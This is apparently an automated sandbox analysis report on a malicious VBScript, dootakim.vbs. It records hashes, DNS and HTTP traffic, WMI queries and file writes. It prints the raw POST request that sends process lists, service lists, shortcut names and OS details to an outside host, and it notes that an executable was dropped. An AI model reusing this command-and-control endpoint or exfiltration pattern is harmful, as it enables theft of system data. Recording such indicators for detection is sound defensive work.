Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x3201	June 8, 2021, 4:36 p.m.	June 8, 2021, 4:38 p.m.

Size	6.0KB
Type	ASCII text, with CRLF line terminators
MD5	`7bf15c10dd4e523a1338d054c0ace9d9`
SHA256	`d5213a7612dbeec88cbfd73d8457b741f9014b137e640ff81bb8c1742b066a0d`
CRC32	`40A5D1EF`
ssdeep	`192:ADeat+P8BlCqCSVXy+t34iBdEEWcOU0rAZtkVnZzqU/C+6tpMf:ADeat+PqlCqCSVXy+t34i7EErL4AtkVL`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\ADMINI~1\AppData\Local\Temp\dootakim.vbs
2916

Name	Response	Post-Analysis Lookup
csc3-2004-crl.verisign.com
sv.symcb.com	CNAME crl-symcprod.digicert.com CNAME cs9.wac.phicdn.net A 117.18.237.29	117.18.237.29
alyssalove.getenjoyment.net	A 185.176.43.98	185.176.43.98
ocsp.verisign.com	CNAME ocsp-ds.ws.symantec.com.edgekey.net CNAME e8218.dscb1.akamaiedge.net A 23.74.19.27	23.4.43.27
s2.symcb.com	CNAME ocsp-ds.ws.symantec.com.edgekey.net CNAME e8218.dscb1.akamaiedge.net A 23.74.19.27	23.4.43.27
crl.verisign.com	CNAME crl-symcprod.digicert.com CNAME cs9.wac.phicdn.net A 117.18.237.29	117.18.237.29
evcs-ocsp.ws.symantec.com	CNAME ocsp-ds.ws.symantec.com.edgekey.net CNAME e8218.dscb1.akamaiedge.net A 23.74.19.27	23.4.43.27
ocsp.digicert.com	CNAME cs9.wac.phicdn.net A 117.18.237.29	117.18.237.29
sv.symcd.com	CNAME ocsp-ds.ws.symantec.com.edgekey.net CNAME e8218.dscb1.akamaiedge.net A 23.37.139.27 A 23.74.19.27	23.4.43.27

IP Address	Status	Action
117.18.237.29	Active	Moloch
164.124.101.2	Active	Moloch
185.176.43.98	Active	Moloch
23.37.139.27	Active	Moloch
23.74.19.27	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49608 -> 185.176.43.98:80	2027117	ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 8, 2021, 4:36 p.m.	computer_name: WIN7-PC	1	1
GetComputerNameW June 8, 2021, 4:36 p.m.	computer_name: WIN7-PC	1	1
GetComputerNameW June 8, 2021, 4:36 p.m.	computer_name: WIN7-PC	1	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files

Performs some HTTP requests (16 events)

request	GET http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEGxZ76nhAOEO4wa6j%2BApJVk%3D
request	GET http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEFDtZ0JVYUv07T7UI8yTyn0%3D
request	GET http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
request	GET http://s2.symcb.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCED141%2Fl2SWCyYX308B7Khio%3D
request	GET http://sv.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEBLwJ34PIzs5%2BUGbBujN41I%3D
request	GET http://sv.symcb.com/sv.crl
request	GET http://crl.verisign.com/pca3.crl
request	GET http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECcNdVyfWsO322H1CZgocHg%3D
request	GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D
request	GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAx5qUSwjBGVIJJhX%2BJrHYM%3D
request	GET http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCEDA2ePYtKPWPCdFq3RW5wHE%3D
request	GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEA3etT%2BVczf76vmMSmFbFJ0%3D
request	GET http://sv.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEADzAwdvBip42MYbURaknTY%3D
request	GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D
request	GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D
request	POST http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files

Sends data using the HTTP POST Method (1 event)

request

POST http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files

Creates executable files on the filesystem (1 event)

file	C:\Users\Administrator\AppData\Roaming\gi.exe

Creates a shortcut to an executable file (29 events)

file	C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\OnlyStopWatch_x64.zip.lnk
file	C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Media Player.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\test_eml.mht.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\네트워크 및 인터넷.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\agent.pyw.lnk
file	C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\agent.py.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\한글2007.lnk
file	C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer (2).lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\모든 제어판 항목.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\agent.lnk
file	C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\로컬 디스크 (C).lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\프로그램.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\모양 및 개인 설정.lnk
file	C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\사용자 계정 및 가족 보호.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\test.eml.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\policies.json.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\age.pyw.lnk
file	C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Start Tor Browser.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\Python27.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\office_2007.lnk
file	C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer (2).lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\알림 영역 아이콘.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\다운로드.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\sn.txt.lnk
file	C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\시스템 및 보안.lnk

Executes one or more WMI queries (4 events)

wmi	Select Name, Version from Win32_Product Where Name Like 'Microsoft .NET Framework%'
wmi	Select * from Win32_Process
wmi	Select * from Win32_OperatingSystem
wmi	Select * from Win32_Service WHERE state = "Running"

Wscript.exe initiated network communications indicative of a script based payload download (2 events)

Time & API	Arguments	Status	Return	Repeated
WSASend June 8, 2021, 4:37 p.m.	buffer: POST /0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 1883 Host: alyssalove.getenjoyment.net socket: 816		0	0
WSASend June 8, 2021, 4:37 p.m.	buffer: v=aelookupsvc appmgmt audioendpointbuilder audiosrv bfe bits browser cryptsvc cscservice dcomlaunch dhcp dnscache dps eventlog eventsystem fdphost fdrespub fontcache gpsvc ikeext iphlpsvc lanmanserver lanmanworkstation mmcss mpssvc netman netprofm nlasvc nsi pcasvc plugplay policyagent power profsvc protectedstorage rpceptmapper rpcss samss schedule sens shellhwdetection spooler sppsvc sppuinotify ssdpsrv sysmain themes trkwks upnphost uxsms w32time wcncsvc wdiservicehost windefend winhttpautoproxysvc winmgmt wmpnetworksvc wscsvc wsearch wuauserv system idle process system smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe lsass.exe lsm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe taskhost.exe svchost.exe sppsvc.exe svchost.exe svchost.exe dwm.exe explorer.exe groovemonitor.exe pw.exe searchindexer.exe wmpnetwk.exe audiodg.exe mobsync.exe pw.exe taskhost.exe slui.exe searchprotocolhost.exe searchfilterhost.exe wscript.exe wmiprvse.exe &r=age.pyw.lnk====agent.lnk====agent.py.lnk====agent.pyw.lnk====desktop.ini====office_2007.lnk====OnlyStopWatch_x64.zip.lnk====policies.json.lnk====Python27.lnk====sn.txt.lnk====test.eml.lnk====test_eml.mht.lnk====ë¤í¸ìí¬ ë° ì¸í°ë·.lnk====ë¤ì´ë¡ë.lnk====ë¡ì»¬ ëì¤í¬ (C).lnk====ëª¨ë ì ì´í íëª©.lnk====ëª¨ì ë° ê°ì¸ ì¤ì .lnk====ì¬ì©ì ê³ì ë° ê°ì¡± ë³´í¸.lnk====ìì¤í ë° ë³´ì.lnk====ìë¦¼ ìì ìì´ì½.lnk====íë¡ê·¸ë¨.lnk====íê¸2007.lnk====&un=Administrator&os=Microsoft Windows 7 Ultimate K \|C:\Windows\|\Device\Harddisk0\Partition2&sv=6.1.7601&msv=12&dnv=4.5.50709&dll=desktop.ini====&tll=Chrome.lnk====desktop.ini====Firefox.lnk====Internet Explorer (2).lnk====Internet Explorer.lnk====Start Tor Browser.lnk====Windows Explorer (2).lnk====Windows Explorer.lnk====Windows Media Player.lnk==== socket: 816		0	0

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
WSASend June 8, 2021, 4:37 p.m.	buffer: POST /0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 1883 Host: alyssalove.getenjoyment.net socket: 816		0	0
WSASend June 8, 2021, 4:37 p.m.	buffer: v=aelookupsvc appmgmt audioendpointbuilder audiosrv bfe bits browser cryptsvc cscservice dcomlaunch dhcp dnscache dps eventlog eventsystem fdphost fdrespub fontcache gpsvc ikeext iphlpsvc lanmanserver lanmanworkstation mmcss mpssvc netman netprofm nlasvc nsi pcasvc plugplay policyagent power profsvc protectedstorage rpceptmapper rpcss samss schedule sens shellhwdetection spooler sppsvc sppuinotify ssdpsrv sysmain themes trkwks upnphost uxsms w32time wcncsvc wdiservicehost windefend winhttpautoproxysvc winmgmt wmpnetworksvc wscsvc wsearch wuauserv system idle process system smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe lsass.exe lsm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe taskhost.exe svchost.exe sppsvc.exe svchost.exe svchost.exe dwm.exe explorer.exe groovemonitor.exe pw.exe searchindexer.exe wmpnetwk.exe audiodg.exe mobsync.exe pw.exe taskhost.exe slui.exe searchprotocolhost.exe searchfilterhost.exe wscript.exe wmiprvse.exe &r=age.pyw.lnk====agent.lnk====agent.py.lnk====agent.pyw.lnk====desktop.ini====office_2007.lnk====OnlyStopWatch_x64.zip.lnk====policies.json.lnk====Python27.lnk====sn.txt.lnk====test.eml.lnk====test_eml.mht.lnk====ë¤í¸ìí¬ ë° ì¸í°ë·.lnk====ë¤ì´ë¡ë.lnk====ë¡ì»¬ ëì¤í¬ (C).lnk====ëª¨ë ì ì´í íëª©.lnk====ëª¨ì ë° ê°ì¸ ì¤ì .lnk====ì¬ì©ì ê³ì ë° ê°ì¡± ë³´í¸.lnk====ìì¤í ë° ë³´ì.lnk====ìë¦¼ ìì ìì´ì½.lnk====íë¡ê·¸ë¨.lnk====íê¸2007.lnk====&un=Administrator&os=Microsoft Windows 7 Ultimate K \|C:\Windows\|\Device\Harddisk0\Partition2&sv=6.1.7601&msv=12&dnv=4.5.50709&dll=desktop.ini====&tll=Chrome.lnk====desktop.ini====Firefox.lnk====Internet Explorer (2).lnk====Internet Explorer.lnk====Start Tor Browser.lnk====Windows Explorer (2).lnk====Windows Explorer.lnk====Windows Media Player.lnk==== socket: 816		0	0

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Users\Administrator\AppData\Roaming\gi.exe

Executes one or more WMI queries which can be used to create or modify services (1 event)

wmi	Select * from Win32_Service WHERE state = "Running"

dootakim.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All